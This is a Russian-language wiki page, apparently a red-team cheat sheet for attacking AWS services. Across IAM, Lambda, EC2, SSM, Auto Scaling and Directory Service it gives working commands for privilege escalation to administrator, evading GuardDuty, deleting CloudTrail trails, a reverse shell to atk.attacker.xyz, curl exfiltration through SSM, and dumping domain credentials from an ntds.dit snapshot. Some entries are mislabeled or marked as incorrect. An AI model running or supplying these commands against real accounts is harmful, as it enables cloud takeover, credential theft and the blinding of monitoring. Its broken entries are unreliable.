<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
